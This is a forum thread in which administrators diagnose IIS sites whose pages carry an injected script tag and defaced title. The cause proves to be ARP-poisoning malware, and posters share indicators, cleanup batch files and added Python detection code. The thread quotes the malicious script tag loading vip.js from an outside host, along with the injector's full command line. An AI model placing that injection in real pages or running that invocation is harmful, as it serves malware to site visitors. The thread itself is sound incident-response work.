blueswitch
IIS server hacked "fuck th3 w0rld" entered into title - cannot find infection anywhere

Hi, my web servers (all IIS) have been compromised. We are not sure how, although we think it may have been SQL injection. The following,

"Fuck Th3 W0rld!", is injected into the source code of every Java enabled Website. We cannot clean it nor find the source of the spreading. Here is the Java Source: <script language="JavaScript" src="http://nb88.cn/search/vip.js"></script><title>**** Th3 W0rld!</title> <HTML>

I have run spyware scans and virus scans, and cannot determine where the infection is coming from,
and I have had to stop my web servers. Does anybody have any clue?

This is an emergency.
moorhouselondon

I'm sure you've done this already, but...

First off, turn off access to your site; no one is going to thank you for screwing up their system.
blueswitch (ASKER)

That has already been done. Now I'm trying anything and everything to find the infection.
Your website has an SQL engine embedded in it?  If so, check that parameters sent to the engine are properly validated.  As I understand it, SQL injection is about putting formatting characters into a form.  The contents of that form are served up to the SQL engine, the engine executes the command, but that command now contains a very different type of command to what you intended it to contain.  So what you've got to do is to strip out all characters that could set up such a command.
Our problem is that the hack has already happened; IIS has been compromised.
The database and code are OK.

When I move the database and code to a clean server, the site is normal again,
so my only conclusion is that the server has somehow been modified; however I can't find it.
Have you checked things like Stored Procedures?
No,

but as I mentioned I have physically moved all database files, as well as the web code, to a previously uninfected machine, and the infection does not follow.
Also it affects ASP pages not using databases, so I have determined that it is infecting IIS.
Whether or not IIS is still infected: if a hacker repeats the injection technique on this new server, are you still vulnerable?  Code that deals with input from outside sources needs to be checked to ensure input is thoroughly sanitised.
Agreed, but for now we need to be able to get the sites back up.
not a pleasant Sunday for you...
Not at all.
Interesting.

Here I think it's a variant of those attacks where they managed to get the IIS server infected.
These are very interesting, but the problem is I have a new variant, and my IIS is infected.
I'm really at a standstill.
The articles suggested looking through the logs - you know roughly when the infection started, have a look at transactions occurring a tad prior to that time.  If you don't have the logs then you will need to set the system going and monitor it stringently until it gets infected again.
ASKER CERTIFIED SOLUTION
adds21
Good news indeed.  The SQL coding needs to be reviewed for vulnerabilities, as mentioned.

You shouldn't be running two accounts on EE.  I suggest you do something about that too!
Long night indeed. Thanks adds21, your post pointed me in the right direction. If you find more information please do post it.  I'm back up and running but not sure how; with all the things I tried I'm not sure which one sorted the issue.
adds21,
What did you find? If it's on the SQL server, what was the process called?

What do I look for?

I just restarted my SQL server; it didn't seem to have any effect. I didn't see any process.
Blueswitch:-

Are you doing this on the new, uninfected machine, or the infected one?  
On the infected one. I have many web and SQL servers; here's what I have found out so far.

1. The infection has some type of logic, as it will not show the profanity in the title if the IP of the computer browsing the site is on the same subnet as the infected machine,

meaning all local machines on my network do not see the profanity on all the sites.
This has been verified by using a load balancer which masks the user IP and makes it appear as an internal user; when I placed an infected machine behind the load balancer the outside world did not see the profanity.

2. I think it's on the web server and IIS, not SQL, as when I used a clean IIS machine (that has SQL installed)
and used that, while transferring the entire database folder, including the master, msdb etc., to the IIS machine from an infected machine, the problem went away.

One more thing: it only affects port 80,
so if the site is under SSL the hack does not take effect.
Has anybody else been affected?
OK,

the problem has been resolved. The problem is on the SQL server, as posted above. It's an ARP attack:
a SQL injection attack installs an executable on one of the SQL servers;
that SQL server becomes a pseudo gateway intercepting all web traffic and appending the code above.

It does not modify SQL or IIS in any way.


Additionally, while it may appear many machines are infected, only one is infected (a SQL server),
and it has some program running that is intercepting the ARP traffic and causing all the problems.

isaac
As an update, I've been unable to find the source of the SQL injection, but scanning the SQL Server for files modified on Sat 21st 2008 at 7pm I found files relating to the following:

http://www.sophos.com/security/analyses/viruses-and-spyware/w32rbotgvm.html

wpcap.dll and the other files can indeed enable uploaded files to access the network card at the network level and hence mess with ARP and other traffic.

Stephen
blueswitch,

What is the name of the exe?  I still cannot find it on any of my servers.
The EXE was called wapsrv.exe; it had a created date of the 21st. The full list of files that were created is as follows.

System32\drivers\npf.sys
System32\packet.dll
System32\wpcap.dll
System32\wanpacket.dll
System32\wapsrv.exe
Thank you stephenevans!   Finally a real fix instead of the 'I fixed it but have no clue what I did or how it works' posts we had been seeing.
I found the culprit. I made 2 scripts, one for 2000 and one for XP/Server.

2000.bat
rem remove the dropped WinPcap components and the injector from the Windows 2000 system directory
del c:\WINNT\system32\packet.dll
del c:\WINNT\system32\wanpacket.dll
del c:\WINNT\system32\wapsrv.exe
del c:\WINNT\system32\wpcap.dll
del c:\WINNT\system32\drivers\npf.sys
pause

XP/Server
rem same files under the Windows XP / Server system directory
del c:\windows\system32\packet.dll
del c:\windows\system32\wanpacket.dll
del c:\windows\system32\wapsrv.exe
del c:\windows\system32\wpcap.dll
del c:\windows\system32\drivers\npf.sys
pause

These batches did find some files and delete them, but eventually I found one machine with access denied on the deletion.  After looking over the processes there was only one svchost.exe process run by the local user account; its switches were:

C:\WINDOWS\system32\svchost.exe -idx 0 -ip 192.168.5.1-192.168.5.255 -port 80 -insert "<script language="""JavaScript""" src="""http://nb88.cn/search/vip.js"""></script><title>Fuck Th3 W0rld!</title>"

Thanks again stephenevans
svchost.exe was being run from c:\windows\system32\waptimes.exe

Triggered from HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
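The indicators quoted in the two posts above (the dropped file names, the injector's command-line switches and the Run key) can be turned into a simple host check. This is an added example, not code from the thread; the process listing and Run-key entries it scans are constructed here, and the value name "svcupdate" is an assumption.

```python
import re

# Indicators quoted in this thread: the dropped files, the injector's command-line
# switches and the Run key it was launched from.
IOC_FILES = {"packet.dll", "wanpacket.dll", "wapsrv.exe", "wpcap.dll",
             "npf.sys", "waptimes.exe"}
INSERT_SWITCH = re.compile(r'-insert\s+"?<script', re.IGNORECASE)
RANGE_SWITCH = re.compile(r"-ip\s+\d{1,3}(?:\.\d{1,3}){3}-\d{1,3}(?:\.\d{1,3}){3}\s+-port\s+\d+",
                          re.IGNORECASE)

def classify_process(image_path, cmdline):
    """Return the reasons this process matches the injector (empty list = nothing found)."""
    reasons = []
    name = image_path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if name in IOC_FILES:
        reasons.append("image is one of the dropped files: " + name)
    if INSERT_SWITCH.search(cmdline):
        reasons.append("command line carries an -insert <script ...> payload")
    if RANGE_SWITCH.search(cmdline):
        reasons.append("command line targets an IP range and a port, like the injector")
    # Genuine svchost.exe is started by services.exe with a -k <group> switch.
    if name == "svchost.exe" and not re.search(r"(^|\s)-k\s", cmdline):
        reasons.append("svchost.exe without the usual -k service-group switch")
    return reasons

def suspicious_run_values(run_values):
    """run_values: {value name: command} read from the Run key; returns names launching an IOC file."""
    return sorted(n for n, cmd in run_values.items()
                  if any(f in cmd.lower() for f in IOC_FILES))

# Constructed samples: a clean service host and an entry modelled on the command line quoted above.
CLEAN = (r"C:\WINDOWS\system32\svchost.exe", r"C:\WINDOWS\system32\svchost.exe -k netsvcs")
INJECTOR = (r"C:\WINDOWS\system32\waptimes.exe",
            r'C:\WINDOWS\system32\svchost.exe -idx 0 -ip 192.168.5.1-192.168.5.255 -port 80 '
            r'-insert "<script language="""JavaScript""" src="""http://nb88.cn/search/vip.js"""></script>"')
RUN_KEY = {"svcupdate": r"C:\WINDOWS\system32\waptimes.exe",   # constructed value name
           "ctfmon": r"C:\WINDOWS\system32\ctfmon.exe"}

if __name__ == "__main__":
    for image, cmd in (CLEAN, INJECTOR):
        print(image, "->", classify_process(image, cmd) or "clean")
    print("Run-key entries launching dropped files:", suspicious_run_values(RUN_KEY))
```

On a real box the inputs would come from a process listing with full command lines and from the Run key named above; the matching logic is what the thread's findings support.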
First of all thank you all for your input.

I checked every server on my network and none of the following files "packet.dll, wanpacket.dll, wapsrv.exe, wpcap.dll, npf.sys and waptimes.exe" were found on my servers.  Also checked my processes using Process Explorer on each server and did not find anything abnormal.  The virus seems to come and go, and when it's active it severely slows down the internet and LAN/WAN traffic.  I even tried Wireshark to find the misc traffic from each server.  Symantec stops the VIP.js and its other names on the workstations.  Any of your admins running Symantec Endpoint Protection on your network?  Any other comments, ideas, thoughts to eradicate this bug?
It doesn't have to be a server; the machine that we ended up finding it running on was an XP client PC.

If you can't find it via software try to isolate it with hardware, try to segment off some of the network with say another router.  Eventually you'll see some computers still affected while others won't be, maybe segment off a specific section of a building or an office.
I was under the impression that it was a server virus, thanks for information.  What anti-virus software are you running on the workstations?
Mohamed Osama
For the sake of Google & Search engines

http://www.symantec.com/security_response/writeup.jsp?docid=2007-061222-0609-99


This is the original culprit: a low profile worm that injects malicious HTML code into local HTTP traffic using ARP poisoning attacks. The IFrames injected differ, but the payload is usually executing JS / VBS trojan downloaders. McAfee detects it as Trojan VBS/PSYME, Kaspersky detects it as Trojan-Downloader.JS.Multi.cn.
Upon execution this will download further malware, some of which was extremely difficult to remove.

I cleaned up an infected LAN today by running Wireshark for a couple of minutes, identified the machine(s) which were performing the ARP spoofing and went there for a hands-on cleanup. Once cleaned, other users who experienced the VBS/PSYME message
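The capture-based approach in this answer, and the rewritten page source the asker pasted at the top, can both be checked mechanically. This is an added example, not code from the thread: the ARP replies and HTTP bodies are constructed, and 192.168.5.1 is assumed to be the gateway.

```python
from collections import defaultdict

# Constructed ARP replies (sender IP, sender MAC) as exported from a short capture of the LAN;
# 192.168.5.1 is assumed to be the real gateway. One host answers for addresses that are not its own.
SAMPLE_ARP_REPLIES = [
    ("192.168.5.1", "00:11:22:33:44:01"),   # gateway's own reply
    ("192.168.5.20", "00:11:22:33:44:20"),
    ("192.168.5.1", "00:11:22:33:44:77"),   # a second MAC claiming the gateway address
    ("192.168.5.20", "00:11:22:33:44:77"),  # the same MAC also claiming a client address
    ("192.168.5.30", "00:11:22:33:44:30"),
]

def arp_conflicts(replies):
    """Map each IP claimed by more than one MAC to the sorted list of MACs that claimed it."""
    claims = defaultdict(set)
    for ip, mac in replies:
        claims[ip].add(mac.lower())
    return {ip: sorted(macs) for ip, macs in claims.items() if len(macs) > 1}

def likely_poisoner(replies):
    """The MAC involved in the most conflicting claims: the host to pull off the LAN and clean."""
    score = defaultdict(int)
    for macs in arp_conflicts(replies).values():
        for mac in macs:
            score[mac] += 1
    return max(score, key=score.get) if score else None

def script_before_html(body):
    """True when a <script> tag precedes the first <html> tag, as in the source pasted above;
    a page whose author never wrote it that way is being rewritten in transit."""
    low = body.lower()
    script_at, html_at = low.find("<script"), low.find("<html")
    return script_at != -1 and (html_at == -1 or script_at < html_at)

# Constructed HTTP bodies: one as served by IIS, one as seen through the poisoning host.
CLEAN_BODY = "<HTML><HEAD><title>Intranet</title></HEAD><BODY>hello</BODY></HTML>"
INJECTED_BODY = ('<script language="JavaScript" src="http://nb88.cn/search/vip.js"></script>'
                 "<title>defaced</title> " + CLEAN_BODY)

if __name__ == "__main__":
    print("conflicting ARP claims:", arp_conflicts(SAMPLE_ARP_REPLIES))
    print("likely poisoner:", likely_poisoner(SAMPLE_ARP_REPLIES))
    print("rewritten in transit:", script_before_html(INJECTED_BODY))
```

Comparing the same page fetched from inside and outside the subnet, as the asker did with the load balancer, is the quickest way to confirm the rewrite happens on the wire rather than on the web server.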